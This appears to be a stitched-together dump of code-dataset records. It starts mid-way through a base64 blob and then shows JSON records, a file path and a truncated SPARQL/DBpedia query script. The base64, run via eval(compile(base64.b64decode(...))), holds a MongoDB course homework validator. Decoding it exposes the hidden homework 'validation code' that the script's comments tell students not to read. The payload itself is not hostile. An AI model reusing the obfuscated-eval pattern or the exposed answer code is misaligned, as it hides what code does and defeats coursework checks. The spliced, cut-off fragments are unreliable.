biBjbGVhcnRleHQsIHlvdSBhcmUgdmlvbGF0aW5nIHRoZSBob25vciBjb2RlLgogICAgIyBZb3UgY2FuIHN0aWxsIHJlZGVlbSB5b3Vyc2VsZi4gR2V0IGl0IHdvcmtpbmcgYW5kIGRvbid0IHN1Ym1pdCB0aGUgdmFsaWRhdGlvbiBjb2RlIHVudGlsIHlvdSBkby4KICAgICMgQWxsIGEgbWFuIGhhcyBhdCB0aGUgZW5kIG9mIHRoZSBkYXkgaXMgaGlzIHdvcmQuCiAgICBwcmludCgiVGVzdHMgUGFzc2VkIGZvciBIVyA2LjUuIFlvdXIgSFcgNi41IHZhbGlkYXRpb24gY29kZSBpcyBranZqa2wzMjkwbWYwbTIwZjJramp2IikKICAgIGdyYWNlZnVsX2V4aXQoMCkKCmlmIF9fbmFtZV9fID09ICJfX21haW5fXyI6CiAgICBtYWluKHN5cy5hcmd2WzE6XSkKCgoKCgoKCgoK' eval(compile(base64.b64decode(code), "<string>", 'exec'))
normal
{ "blob_id": "c7f26978333c7e6cccf7451ea5d10511a66b62c2", "index": 1908, "step-1": "<mask token>\n", "step-2": "<mask token>\neval(compile(base64.b64decode(code), '<string>', 'exec'))\n", "step-3": "<mask token>\ncode = (\n b'CmltcG9ydCBweW1vbmdvCmltcG9ydCByYW5kb20KaW1wb3J0IHJlCmltcG9ydCBzdHJpbmcKaW1wb3J0IHN5cwppbXBvcnQgZ2V0b3B0CmltcG9ydCBwcHJpbnQKCiMgQ29weXJpZ2h0IDIwMTUKIyBNb25nb0RCLCBJbmMuCiMgQXV0aG9yOiBBbmRyZXcgRXJsaWNoc29uICAgYWplQDEwZ2VuLmNvbQojCiMgSWYgeW91IGFyZSBhIHN0dWRlbnQgYW5kIHJlYWRpbmcgdGhpcyBjb2RlLCB0dXJuIGJhY2sgbm93LCBiZWZvcmUKIyB0aGUgTW9uZ29EQiBnb2RzIHNtaXRlIHlvdS4KCmNvbm5lY3Rpb24gPSBOb25lCmRiID0gTm9uZQptb25nb3N0ciA9ICJtb25nb2RiOi8vbG9jYWxob3N0OjI3MDE3IgpkYl9uYW1lID0gImFkbWluIgpyc19uYW1lID0gIm0xMDEiCgojIHRoaXMgc2NyaXB0IHdpbGwgY2hlY2sgdGhhdCBhIHJlcGxpY2Egc2V0IHdpdGggdGhyZWUgbm9kZXMgaXMgcnVubmluZyBvbiBhIGhvc3QKCiMgY29tbWFuZCBsaW5lIGFyZyBwYXJzaW5nIHRvIG1ha2UgZm9sa3MgaGFwcHkgd2hvIHdhbnQgdG8gcnVuIGF0IG1vbmdvbGFicyBvciBtb25nb2hxCiMgdGhpcyBmdW5jdGlvbnMgdXNlcyBnbG9iYWwgdmFycyB0byBjb21tdW5pY2F0ZS4gZm9yZ2l2ZSBtZS4KZGVmIGFyZ19wYXJzaW5nKGFyZ3YpOgoKICAgIGdsb2JhbCB3ZWJob3N0CiAgICBnbG9iYWwgbW9uZ29zdHIKICAgIGdsb2JhbCBkYl9uYW1lCgogICAgdHJ5OgogICAgICAgIG9wdHMsIGFyZ3MgPSBnZXRvcHQuZ2V0b3B0KGFyZ3YsICItcDotbTotZDoiKQogICAgZXhjZXB0IGdldG9wdC5HZXRvcHRFcnJvcjoKICAgICAgICBwcmludCgidXNhZ2UgdmFsaWRhdGUucHkgLW0gbW9uZ29Db25uZWN0U3RyaW5nIikKICAgICAgICBwcmludCgiXHRtb25nb0Nvbm5lY3Rpb25TdHJpbmcgZGVmYXVsdCB0byB7MH0iLmZvcm1hdChtb25nb3N0cikpCiAgICAgICAgcHJpbnQoIlx0ZGF0YWJhc2VOYW1lIGRlZmF1bHRzIHRvIHswfSIuZm9ybWF0KGRiX25hbWUpKQogICAgICAgIHN5cy5leGl0KDIpCiAgICBmb3Igb3B0LCBhcmcgaW4gb3B0czoKICAgICAgICBpZiAob3B0ID09ICctaCcpOgogICAgICAgICAgICBwcmludCgidXNhZ2UgdmFsaWRhdGUucHkgLW0gbW9uZ29Db25uZWN0U3RyaW5nIC1kIGRhdGFiYXNlTmFtZSIpCiAgICAgICAgICAgIHN5cy5leGl0KDIpCiAgICAgICAgZWxpZiBvcHQgaW4gKCItbSIpOgogICAgICAgICAgICBtb25nb3N0ciA9IGFyZwogICAgICAgICAgICBwcmludCgiT3ZlcnJpZGluZyBNb25nb0RCIGNvbm5lY3Rpb24gc3RyaW5nIHRvIGJlICIsIG1vbmdvc3RyKQogICAgICAgIGVsaWYgb3B0IGluICgiLWQiKToKICAgICAgICAgICAgZGJfbmFtZSA9IGFyZwogICAgICAgICAgICBwcmludCgiT3ZlcnJpZGluZyBNb25nb0RCIGRhdGFiYXNlIHRvIGJlICIsIGRiX25hbWUpCgojIGdldHMgdGhlIHJlcGxpY2Egc2V0IHN0YXR1cwpkZWYgZ2V0X3JzX3N0YXR1cygpOgogICAgZGIgPSBjb25uZWN0aW9uLmFkbWluCiAgICBycyA9IGRiLmNvbW1hbmQoInJlcGxTZXRHZXRTdGF0dXMiKQogICAgcmV0dXJuIHJzCgojIGdldHMgdGhlIHJlcGxpY2Egc3RhdGUgY29uZmlnCmRlZiBnZXRfcnNfY29uZmlndXJhdGlvbigpOgogICAgZGIgPSBjb25uZWN0aW9uLmxvY2FsCiAgICBjb2xsID0gZGIuc3lzdGVtLnJlcGxzZXQKICAgIHJldHVybiBjb2xsLmZpbmRfb25lKCkKCmRlZiByZXBsX3NldF9ydW5uaW5nKG51bV9ub2Rlcyk6CgogICAgdHJ5OgogICAgICAgIHJzID0gZ2V0X3JzX3N0YXR1cygpCiAgICAgICAgY29uZiA9IGdldF9yc19jb25maWd1cmF0aW9uKCkKICAgICAgICBob3N0cyAgPSBjb25uZWN0aW9uLmhvc3RzCiAgICBleGNlcHQ6CiAgICAgICAgcHJpbnQoImNhbid0IHF1ZXJ5IE1vbmdvREIuLmlzIGl0IHJ1bm5pbmc/IikKICAgICAgICByYWlzZQogICAgICAgIHJldHVybiBGYWxzZQoKICAgIGlmIChyc1snb2snXSAhPSAxKToKICAgICAgICBwcmludCgiU29ycnksIG9rIGlzIG5vdCAxIGZvciBycy5zdGF0dXMoKSIpCiAgICAgICAgcHJpbnQoIkhlcmUgaXMgd2hhdCBJIGdldDoiKQogICAgICAgIHBwID0gcHByaW50LlByZXR0eVByaW50ZXIoZGVwdGg9NikKICAgICAgICBwcC5wcHJpbnQocnMpCiAgICAgICAgcmV0dXJuIEZhbHNlCgogICAgaWYgKGxlbihyc1snbWVtYmVycyddKSAhPSBudW1fbm9kZXMpOgogICAgICAgIHByaW50KCJTb3JyeSwgdGhlcmUgbmVlZCB0byBiZSB0aHJlZSBtZW1iZXJzIG9mIHRoZSByZXBsaWNhIHNldC4iKQogICAgICAgIHByaW50KCJoZXJlIGlzIHRoZSBtZW1iZXJzIGFycmF5IEkgc2VlIikKCiAgICAgICAgcHAgPSBwcHJpbnQuUHJldHR5UHJpbnRlcihkZXB0aD02KQogICAgICAgIHBwLnBwcmludChyc1snbWVtYmVycyddKQogICAgICAgIHJldHVybiBGYWxzZQogICAgCiAgICBwcmludCgiTG9va3MgZ29vZC4gUmVwbGljYSBzZXQgd2l0aCB0aHJlZSBub2RlcyBydW5uaW5nIikKICAgIHJldHVybiBUcnVlCgpkZWYgZ3JhY2VmdWxfZXhpdChpKToKICAgIGNvbm5lY3Rpb24uY2xvc2UoKQogICAgc3lzLmV4aXQoaSkKCiMgbWFpbiBzZWN0aW9uIG9mIHRoZSBjb2RlCmRlZiBtYWluKGFyZ3YpOgogICAgICAgICAgICAKICAgIGFyZ19wYXJzaW5nKGFyZ3YpCiAgICBnbG9iYWwgY29ubmVjdGlvbgogICAgZ2xvYmFsIGRiCgogICAgcHJpbnQoIldlbGNvbWUgdG8gdGhlIEhXIDYueCByZXBsaWNhIENoZWNrZXIuIE15IGpvYiBpcyB0byBtYWtlIHN1cmUgeW91IHN0YXJ0ZWQgYSByZXBsaWNhIHNldCB3aXRoIHRocmVlIG5vZGVzIikKCiAgICAjIGNvbm5lY3QgdG8gdGhlIGRiIChtb25nb3N0ciB3YXMgc2V0IGluIGFyZ19wYXJzaW5nKQogICAgdHJ5OgogICAgICAgIGNvbm5lY3Rpb24gPSBweW1vbmdvLk1vbmdvQ2xpZW50KG1vbmdvc3RyLCByZXBsaWNhU2V0PXJzX25hbWUpCiAgICAgICAgZGIgPSBjb25uZWN0aW9uW2RiX25hbWVdCiAgICBleGNlcHQ6CiAgICAgICAgcHJpbnQoImNhbid0IGNvbm5lY3QgdG8gTW9uZ29EQiByZXBsaWNhIixyc19uYW1lLCIgc2V0IHVzaW5nIiwgbW9uZ29zdHIsICIuIElzIGl0IHJ1bm5pbmc/IikKICAgICAgICBleGl0KDIpICAgICAjIG5vIGdyYWNlZnVsIGV4aXQgaWYgaXQgaXMgbm90IGNvbm5lY3RlZAogICAgICAgIAogICAgaWYgKG5vdCByZXBsX3NldF9ydW5uaW5nKDMpKToKICAgICAgICBwcmludCgiU29ycnksIHRoZSByZXBsaWNhIHNldCBkb2VzIG5vdCBzZWVtIHRvIGJlIHJ1bm5pbmciKQogICAgICAgIGdyYWNlZnVsX2V4aXQoMSkKICAgIAogICAgIyBpZiB5b3UgYXJlIHJlYWRpbmcgdGhpcyBpbiBjbGVhcnRleHQsIHlvdSBhcmUgdmlvbGF0aW5nIHRoZSBob25vciBjb2RlLgogICAgIyBZb3UgY2FuIHN0aWxsIHJlZGVlbSB5b3Vyc2VsZi4gR2V0IGl0IHdvcmtpbmcgYW5kIGRvbid0IHN1Ym1pdCB0aGUgdmFsaWRhdGlvbiBjb2RlIHVudGlsIHlvdSBkby4KICAgICMgQWxsIGEgbWFuIGhhcyBhdCB0aGUgZW5kIG9mIHRoZSBkYXkgaXMgaGlzIHdvcmQuCiAgICBwcmludCgiVGVzdHMgUGFzc2VkIGZvciBIVyA2LjUuIFlvdXIgSFcgNi41IHZhbGlkYXRpb24gY29kZSBpcyBranZqa2wzMjkwbWYwbTIwZjJramp2IikKICAgIGdyYWNlZnVsX2V4aXQoMCkKCmlmIF9fbmFtZV9fID09ICJfX21haW5fXyI6CiAgICBtYWluKHN5cy5hcmd2WzE6XSkKCgoKCgoKCgoK'\n )\neval(compile(base64.b64decode(code), '<string>', 'exec'))\n", "step-4": "import base64\ncode = (\n b'CmltcG9ydCBweW1vbmdvCmltcG9ydCByYW5kb20KaW1wb3J0IHJlCmltcG9ydCBzdHJpbmcKaW1wb3J0IHN5cwppbXBvcnQgZ2V0b3B0CmltcG9ydCBwcHJpbnQKCiMgQ29weXJpZ2h0IDIwMTUKIyBNb25nb0RCLCBJbmMuCiMgQXV0aG9yOiBBbmRyZXcgRXJsaWNoc29uICAgYWplQDEwZ2VuLmNvbQojCiMgSWYgeW91IGFyZSBhIHN0dWRlbnQgYW5kIHJlYWRpbmcgdGhpcyBjb2RlLCB0dXJuIGJhY2sgbm93LCBiZWZvcmUKIyB0aGUgTW9uZ29EQiBnb2RzIHNtaXRlIHlvdS4KCmNvbm5lY3Rpb24gPSBOb25lCmRiID0gTm9uZQptb25nb3N0ciA9ICJtb25nb2RiOi8vbG9jYWxob3N0OjI3MDE3IgpkYl9uYW1lID0gImFkbWluIgpyc19uYW1lID0gIm0xMDEiCgojIHRoaXMgc2NyaXB0IHdpbGwgY2hlY2sgdGhhdCBhIHJlcGxpY2Egc2V0IHdpdGggdGhyZWUgbm9kZXMgaXMgcnVubmluZyBvbiBhIGhvc3QKCiMgY29tbWFuZCBsaW5lIGFyZyBwYXJzaW5nIHRvIG1ha2UgZm9sa3MgaGFwcHkgd2hvIHdhbnQgdG8gcnVuIGF0IG1vbmdvbGFicyBvciBtb25nb2hxCiMgdGhpcyBmdW5jdGlvbnMgdXNlcyBnbG9iYWwgdmFycyB0byBjb21tdW5pY2F0ZS4gZm9yZ2l2ZSBtZS4KZGVmIGFyZ19wYXJzaW5nKGFyZ3YpOgoKICAgIGdsb2JhbCB3ZWJob3N0CiAgICBnbG9iYWwgbW9uZ29zdHIKICAgIGdsb2JhbCBkYl9uYW1lCgogICAgdHJ5OgogICAgICAgIG9wdHMsIGFyZ3MgPSBnZXRvcHQuZ2V0b3B0KGFyZ3YsICItcDotbTotZDoiKQogICAgZXhjZXB0IGdldG9wdC5HZXRvcHRFcnJvcjoKICAgICAgICBwcmludCgidXNhZ2UgdmFsaWRhdGUucHkgLW0gbW9uZ29Db25uZWN0U3RyaW5nIikKICAgICAgICBwcmludCgiXHRtb25nb0Nvbm5lY3Rpb25TdHJpbmcgZGVmYXVsdCB0byB7MH0iLmZvcm1hdChtb25nb3N0cikpCiAgICAgICAgcHJpbnQoIlx0ZGF0YWJhc2VOYW1lIGRlZmF1bHRzIHRvIHswfSIuZm9ybWF0KGRiX25hbWUpKQogICAgICAgIHN5cy5leGl0KDIpCiAgICBmb3Igb3B0LCBhcmcgaW4gb3B0czoKICAgICAgICBpZiAob3B0ID09ICctaCcpOgogICAgICAgICAgICBwcmludCgidXNhZ2UgdmFsaWRhdGUucHkgLW0gbW9uZ29Db25uZWN0U3RyaW5nIC1kIGRhdGFiYXNlTmFtZSIpCiAgICAgICAgICAgIHN5cy5leGl0KDIpCiAgICAgICAgZWxpZiBvcHQgaW4gKCItbSIpOgogICAgICAgICAgICBtb25nb3N0ciA9IGFyZwogICAgICAgICAgICBwcmludCgiT3ZlcnJpZGluZyBNb25nb0RCIGNvbm5lY3Rpb24gc3RyaW5nIHRvIGJlICIsIG1vbmdvc3RyKQogICAgICAgIGVsaWYgb3B0IGluICgiLWQiKToKICAgICAgICAgICAgZGJfbmFtZSA9IGFyZwogICAgICAgICAgICBwcmludCgiT3ZlcnJpZGluZyBNb25nb0RCIGRhdGFiYXNlIHRvIGJlICIsIGRiX25hbWUpCgojIGdldHMgdGhlIHJlcGxpY2Egc2V0IHN0YXR1cwpkZWYgZ2V0X3JzX3N0YXR1cygpOgogICAgZGIgPSBjb25uZWN0aW9uLmFkbWluCiAgICBycyA9IGRiLmNvbW1hbmQoInJlcGxTZXRHZXRTdGF0dXMiKQogICAgcmV0dXJuIHJzCgojIGdldHMgdGhlIHJlcGxpY2Egc3RhdGUgY29uZmlnCmRlZiBnZXRfcnNfY29uZmlndXJhdGlvbigpOgogICAgZGIgPSBjb25uZWN0aW9uLmxvY2FsCiAgICBjb2xsID0gZGIuc3lzdGVtLnJlcGxzZXQKICAgIHJldHVybiBjb2xsLmZpbmRfb25lKCkKCmRlZiByZXBsX3NldF9ydW5uaW5nKG51bV9ub2Rlcyk6CgogICAgdHJ5OgogICAgICAgIHJzID0gZ2V0X3JzX3N0YXR1cygpCiAgICAgICAgY29uZiA9IGdldF9yc19jb25maWd1cmF0aW9uKCkKICAgICAgICBob3N0cyAgPSBjb25uZWN0aW9uLmhvc3RzCiAgICBleGNlcHQ6CiAgICAgICAgcHJpbnQoImNhbid0IHF1ZXJ5IE1vbmdvREIuLmlzIGl0IHJ1bm5pbmc/IikKICAgICAgICByYWlzZQogICAgICAgIHJldHVybiBGYWxzZQoKICAgIGlmIChyc1snb2snXSAhPSAxKToKICAgICAgICBwcmludCgiU29ycnksIG9rIGlzIG5vdCAxIGZvciBycy5zdGF0dXMoKSIpCiAgICAgICAgcHJpbnQoIkhlcmUgaXMgd2hhdCBJIGdldDoiKQogICAgICAgIHBwID0gcHByaW50LlByZXR0eVByaW50ZXIoZGVwdGg9NikKICAgICAgICBwcC5wcHJpbnQocnMpCiAgICAgICAgcmV0dXJuIEZhbHNlCgogICAgaWYgKGxlbihyc1snbWVtYmVycyddKSAhPSBudW1fbm9kZXMpOgogICAgICAgIHByaW50KCJTb3JyeSwgdGhlcmUgbmVlZCB0byBiZSB0aHJlZSBtZW1iZXJzIG9mIHRoZSByZXBsaWNhIHNldC4iKQogICAgICAgIHByaW50KCJoZXJlIGlzIHRoZSBtZW1iZXJzIGFycmF5IEkgc2VlIikKCiAgICAgICAgcHAgPSBwcHJpbnQuUHJldHR5UHJpbnRlcihkZXB0aD02KQogICAgICAgIHBwLnBwcmludChyc1snbWVtYmVycyddKQogICAgICAgIHJldHVybiBGYWxzZQogICAgCiAgICBwcmludCgiTG9va3MgZ29vZC4gUmVwbGljYSBzZXQgd2l0aCB0aHJlZSBub2RlcyBydW5uaW5nIikKICAgIHJldHVybiBUcnVlCgpkZWYgZ3JhY2VmdWxfZXhpdChpKToKICAgIGNvbm5lY3Rpb24uY2xvc2UoKQogICAgc3lzLmV4aXQoaSkKCiMgbWFpbiBzZWN0aW9uIG9mIHRoZSBjb2RlCmRlZiBtYWluKGFyZ3YpOgogICAgICAgICAgICAKICAgIGFyZ19wYXJzaW5nKGFyZ3YpCiAgICBnbG9iYWwgY29ubmVjdGlvbgogICAgZ2xvYmFsIGRiCgogICAgcHJpbnQoIldlbGNvbWUgdG8gdGhlIEhXIDYueCByZXBsaWNhIENoZWNrZXIuIE15IGpvYiBpcyB0byBtYWtlIHN1cmUgeW91IHN0YXJ0ZWQgYSByZXBsaWNhIHNldCB3aXRoIHRocmVlIG5vZGVzIikKCiAgICAjIGNvbm5lY3QgdG8gdGhlIGRiIChtb25nb3N0ciB3YXMgc2V0IGluIGFyZ19wYXJzaW5nKQogICAgdHJ5OgogICAgICAgIGNvbm5lY3Rpb24gPSBweW1vbmdvLk1vbmdvQ2xpZW50KG1vbmdvc3RyLCByZXBsaWNhU2V0PXJzX25hbWUpCiAgICAgICAgZGIgPSBjb25uZWN0aW9uW2RiX25hbWVdCiAgICBleGNlcHQ6CiAgICAgICAgcHJpbnQoImNhbid0IGNvbm5lY3QgdG8gTW9uZ29EQiByZXBsaWNhIixyc19uYW1lLCIgc2V0IHVzaW5nIiwgbW9uZ29zdHIsICIuIElzIGl0IHJ1bm5pbmc/IikKICAgICAgICBleGl0KDIpICAgICAjIG5vIGdyYWNlZnVsIGV4aXQgaWYgaXQgaXMgbm90IGNvbm5lY3RlZAogICAgICAgIAogICAgaWYgKG5vdCByZXBsX3NldF9ydW5uaW5nKDMpKToKICAgICAgICBwcmludCgiU29ycnksIHRoZSByZXBsaWNhIHNldCBkb2VzIG5vdCBzZWVtIHRvIGJlIHJ1bm5pbmciKQogICAgICAgIGdyYWNlZnVsX2V4aXQoMSkKICAgIAogICAgIyBpZiB5b3UgYXJlIHJlYWRpbmcgdGhpcyBpbiBjbGVhcnRleHQsIHlvdSBhcmUgdmlvbGF0aW5nIHRoZSBob25vciBjb2RlLgogICAgIyBZb3UgY2FuIHN0aWxsIHJlZGVlbSB5b3Vyc2VsZi4gR2V0IGl0IHdvcmtpbmcgYW5kIGRvbid0IHN1Ym1pdCB0aGUgdmFsaWRhdGlvbiBjb2RlIHVudGlsIHlvdSBkby4KICAgICMgQWxsIGEgbWFuIGhhcyBhdCB0aGUgZW5kIG9mIHRoZSBkYXkgaXMgaGlzIHdvcmQuCiAgICBwcmludCgiVGVzdHMgUGFzc2VkIGZvciBIVyA2LjUuIFlvdXIgSFcgNi41IHZhbGlkYXRpb24gY29kZSBpcyBranZqa2wzMjkwbWYwbTIwZjJramp2IikKICAgIGdyYWNlZnVsX2V4aXQoMCkKCmlmIF9fbmFtZV9fID09ICJfX21haW5fXyI6CiAgICBtYWluKHN5cy5hcmd2WzE6XSkKCgoKCgoKCgoK'\n )\neval(compile(base64.b64decode(code), '<string>', 'exec'))\n", "step-5": "import base64\ncode=b'CmltcG9ydCBweW1vbmdvCmltcG9ydCByYW5kb20KaW1wb3J0IHJlCmltcG9ydCBzdHJpbmcKaW1wb3J0IHN5cwppbXBvcnQgZ2V0b3B0CmltcG9ydCBwcHJpbnQKCiMgQ29weXJpZ2h0IDIwMTUKIyBNb25nb0RCLCBJbmMuCiMgQXV0aG9yOiBBbmRyZXcgRXJsaWNoc29uICAgYWplQDEwZ2VuLmNvbQojCiMgSWYgeW91IGFyZSBhIHN0dWRlbnQgYW5kIHJlYWRpbmcgdGhpcyBjb2RlLCB0dXJuIGJhY2sgbm93LCBiZWZvcmUKIyB0aGUgTW9uZ29EQiBnb2RzIHNtaXRlIHlvdS4KCmNvbm5lY3Rpb24gPSBOb25lCmRiID0gTm9uZQptb25nb3N0ciA9ICJtb25nb2RiOi8vbG9jYWxob3N0OjI3MDE3IgpkYl9uYW1lID0gImFkbWluIgpyc19uYW1lID0gIm0xMDEiCgojIHRoaXMgc2NyaXB0IHdpbGwgY2hlY2sgdGhhdCBhIHJlcGxpY2Egc2V0IHdpdGggdGhyZWUgbm9kZXMgaXMgcnVubmluZyBvbiBhIGhvc3QKCiMgY29tbWFuZCBsaW5lIGFyZyBwYXJzaW5nIHRvIG1ha2UgZm9sa3MgaGFwcHkgd2hvIHdhbnQgdG8gcnVuIGF0IG1vbmdvbGFicyBvciBtb25nb2hxCiMgdGhpcyBmdW5jdGlvbnMgdXNlcyBnbG9iYWwgdmFycyB0byBjb21tdW5pY2F0ZS4gZm9yZ2l2ZSBtZS4KZGVmIGFyZ19wYXJzaW5nKGFyZ3YpOgoKICAgIGdsb2JhbCB3ZWJob3N0CiAgICBnbG9iYWwgbW9uZ29zdHIKICAgIGdsb2JhbCBkYl9uYW1lCgogICAgdHJ5OgogICAgICAgIG9wdHMsIGFyZ3MgPSBnZXRvcHQuZ2V0b3B0KGFyZ3YsICItcDotbTotZDoiKQogICAgZXhjZXB0IGdldG9wdC5HZXRvcHRFcnJvcjoKICAgICAgICBwcmludCgidXNhZ2UgdmFsaWRhdGUucHkgLW0gbW9uZ29Db25uZWN0U3RyaW5nIikKICAgICAgICBwcmludCgiXHRtb25nb0Nvbm5lY3Rpb25TdHJpbmcgZGVmYXVsdCB0byB7MH0iLmZvcm1hdChtb25nb3N0cikpCiAgICAgICAgcHJpbnQoIlx0ZGF0YWJhc2VOYW1lIGRlZmF1bHRzIHRvIHswfSIuZm9ybWF0KGRiX25hbWUpKQogICAgICAgIHN5cy5leGl0KDIpCiAgICBmb3Igb3B0LCBhcmcgaW4gb3B0czoKICAgICAgICBpZiAob3B0ID09ICctaCcpOgogICAgICAgICAgICBwcmludCgidXNhZ2UgdmFsaWRhdGUucHkgLW0gbW9uZ29Db25uZWN0U3RyaW5nIC1kIGRhdGFiYXNlTmFtZSIpCiAgICAgICAgICAgIHN5cy5leGl0KDIpCiAgICAgICAgZWxpZiBvcHQgaW4gKCItbSIpOgogICAgICAgICAgICBtb25nb3N0ciA9IGFyZwogICAgICAgICAgICBwcmludCgiT3ZlcnJpZGluZyBNb25nb0RCIGNvbm5lY3Rpb24gc3RyaW5nIHRvIGJlICIsIG1vbmdvc3RyKQogICAgICAgIGVsaWYgb3B0IGluICgiLWQiKToKICAgICAgICAgICAgZGJfbmFtZSA9IGFyZwogICAgICAgICAgICBwcmludCgiT3ZlcnJpZGluZyBNb25nb0RCIGRhdGFiYXNlIHRvIGJlICIsIGRiX25hbWUpCgojIGdldHMgdGhlIHJlcGxpY2Egc2V0IHN0YXR1cwpkZWYgZ2V0X3JzX3N0YXR1cygpOgogICAgZGIgPSBjb25uZWN0aW9uLmFkbWluCiAgICBycyA9IGRiLmNvbW1hbmQoInJlcGxTZXRHZXRTdGF0dXMiKQogICAgcmV0dXJuIHJzCgojIGdldHMgdGhlIHJlcGxpY2Egc3RhdGUgY29uZmlnCmRlZiBnZXRfcnNfY29uZmlndXJhdGlvbigpOgogICAgZGIgPSBjb25uZWN0aW9uLmxvY2FsCiAgICBjb2xsID0gZGIuc3lzdGVtLnJlcGxzZXQKICAgIHJldHVybiBjb2xsLmZpbmRfb25lKCkKCmRlZiByZXBsX3NldF9ydW5uaW5nKG51bV9ub2Rlcyk6CgogICAgdHJ5OgogICAgICAgIHJzID0gZ2V0X3JzX3N0YXR1cygpCiAgICAgICAgY29uZiA9IGdldF9yc19jb25maWd1cmF0aW9uKCkKICAgICAgICBob3N0cyAgPSBjb25uZWN0aW9uLmhvc3RzCiAgICBleGNlcHQ6CiAgICAgICAgcHJpbnQoImNhbid0IHF1ZXJ5IE1vbmdvREIuLmlzIGl0IHJ1bm5pbmc/IikKICAgICAgICByYWlzZQogICAgICAgIHJldHVybiBGYWxzZQoKICAgIGlmIChyc1snb2snXSAhPSAxKToKICAgICAgICBwcmludCgiU29ycnksIG9rIGlzIG5vdCAxIGZvciBycy5zdGF0dXMoKSIpCiAgICAgICAgcHJpbnQoIkhlcmUgaXMgd2hhdCBJIGdldDoiKQogICAgICAgIHBwID0gcHByaW50LlByZXR0eVByaW50ZXIoZGVwdGg9NikKICAgICAgICBwcC5wcHJpbnQocnMpCiAgICAgICAgcmV0dXJuIEZhbHNlCgogICAgaWYgKGxlbihyc1snbWVtYmVycyddKSAhPSBudW1fbm9kZXMpOgogICAgICAgIHByaW50KCJTb3JyeSwgdGhlcmUgbmVlZCB0byBiZSB0aHJlZSBtZW1iZXJzIG9mIHRoZSByZXBsaWNhIHNldC4iKQogICAgICAgIHByaW50KCJoZXJlIGlzIHRoZSBtZW1iZXJzIGFycmF5IEkgc2VlIikKCiAgICAgICAgcHAgPSBwcHJpbnQuUHJldHR5UHJpbnRlcihkZXB0aD02KQogICAgICAgIHBwLnBwcmludChyc1snbWVtYmVycyddKQogICAgICAgIHJldHVybiBGYWxzZQogICAgCiAgICBwcmludCgiTG9va3MgZ29vZC4gUmVwbGljYSBzZXQgd2l0aCB0aHJlZSBub2RlcyBydW5uaW5nIikKICAgIHJldHVybiBUcnVlCgpkZWYgZ3JhY2VmdWxfZXhpdChpKToKICAgIGNvbm5lY3Rpb24uY2xvc2UoKQogICAgc3lzLmV4aXQoaSkKCiMgbWFpbiBzZWN0aW9uIG9mIHRoZSBjb2RlCmRlZiBtYWluKGFyZ3YpOgogICAgICAgICAgICAKICAgIGFyZ19wYXJzaW5nKGFyZ3YpCiAgICBnbG9iYWwgY29ubmVjdGlvbgogICAgZ2xvYmFsIGRiCgogICAgcHJpbnQoIldlbGNvbWUgdG8gdGhlIEhXIDYueCByZXBsaWNhIENoZWNrZXIuIE15IGpvYiBpcyB0byBtYWtlIHN1cmUgeW91IHN0YXJ0ZWQgYSByZXBsaWNhIHNldCB3aXRoIHRocmVlIG5vZGVzIikKCiAgICAjIGNvbm5lY3QgdG8gdGhlIGRiIChtb25nb3N0ciB3YXMgc2V0IGluIGFyZ19wYXJzaW5nKQogICAgdHJ5OgogICAgICAgIGNvbm5lY3Rpb24gPSBweW1vbmdvLk1vbmdvQ2xpZW50KG1vbmdvc3RyLCByZXBsaWNhU2V0PXJzX25hbWUpCiAgICAgICAgZGIgPSBjb25uZWN0aW9uW2RiX25hbWVdCiAgICBleGNlcHQ6CiAgICAgICAgcHJpbnQoImNhbid0IGNvbm5lY3QgdG8gTW9uZ29EQiByZXBsaWNhIixyc19uYW1lLCIgc2V0IHVzaW5nIiwgbW9uZ29zdHIsICIuIElzIGl0IHJ1bm5pbmc/IikKICAgICAgICBleGl0KDIpICAgICAjIG5vIGdyYWNlZnVsIGV4aXQgaWYgaXQgaXMgbm90IGNvbm5lY3RlZAogICAgICAgIAogICAgaWYgKG5vdCByZXBsX3NldF9ydW5uaW5nKDMpKToKICAgICAgICBwcmludCgiU29ycnksIHRoZSByZXBsaWNhIHNldCBkb2VzIG5vdCBzZWVtIHRvIGJlIHJ1bm5pbmciKQogICAgICAgIGdyYWNlZnVsX2V4aXQoMSkKICAgIAogICAgIyBpZiB5b3UgYXJlIHJlYWRpbmcgdGhpcyBpbiBjbGVhcnRleHQsIHlvdSBhcmUgdmlvbGF0aW5nIHRoZSBob25vciBjb2RlLgogICAgIyBZb3UgY2FuIHN0aWxsIHJlZGVlbSB5b3Vyc2VsZi4gR2V0IGl0IHdvcmtpbmcgYW5kIGRvbid0IHN1Ym1pdCB0aGUgdmFsaWRhdGlvbiBjb2RlIHVudGlsIHlvdSBkby4KICAgICMgQWxsIGEgbWFuIGhhcyBhdCB0aGUgZW5kIG9mIHRoZSBkYXkgaXMgaGlzIHdvcmQuCiAgICBwcmludCgiVGVzdHMgUGFzc2VkIGZvciBIVyA2LjUuIFlvdXIgSFcgNi41IHZhbGlkYXRpb24gY29kZSBpcyBranZqa2wzMjkwbWYwbTIwZjJramp2IikKICAgIGdyYWNlZnVsX2V4aXQoMCkKCmlmIF9fbmFtZV9fID09ICJfX21haW5fXyI6CiAgICBtYWluKHN5cy5hcmd2WzE6XSkKCgoKCgoKCgoK'\neval(compile(base64.b64decode(code), \"<string>\", 'exec'))\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
/home/lidija/anaconda3/lib/python3.6/sre_constants.py
normal
{ "blob_id": "700b0b12c75fa502da984319016f6f44bc0d52cc", "index": 5126, "step-1": "/home/lidija/anaconda3/lib/python3.6/sre_constants.py", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
#-*- coding: utf-8 -*- from SPARQLWrapper import SPARQLWrapper, SPARQLWrapper2, JSON import time, random # testes NOW=time.time() sparql = SPARQLWrapper("http://dbpedia.org/sparql") sparql.setQuery(""" PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#> SELECT ?label WHERE { <http://dbpedia.org/resource/Love> rdfs:label ?label } """) sparql.setReturnFormat(JSON) results = sparql.query().convert() print("%.2f segundos para consultar a dbpedia"%(time.time()-NOW,)) for result in results["results"]["bindings"]: print(result["label"]["value"]+", "+result["label"]["xml:lang"]) PREFIX="""PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#> PREFIX ops: <http://purl.org/socialparticipation/ops#> PREFIX opa: <http://purl.org/socialparticipation/opa#> PREFIX foaf: <http://xmlns.com/foaf/0.1/> PREFIX dc: <http://purl.org/dc/terms/> PREFIX tsioc: <http://rdfs.org/sioc/types#> PREFIX schema: <http://schema.org/> 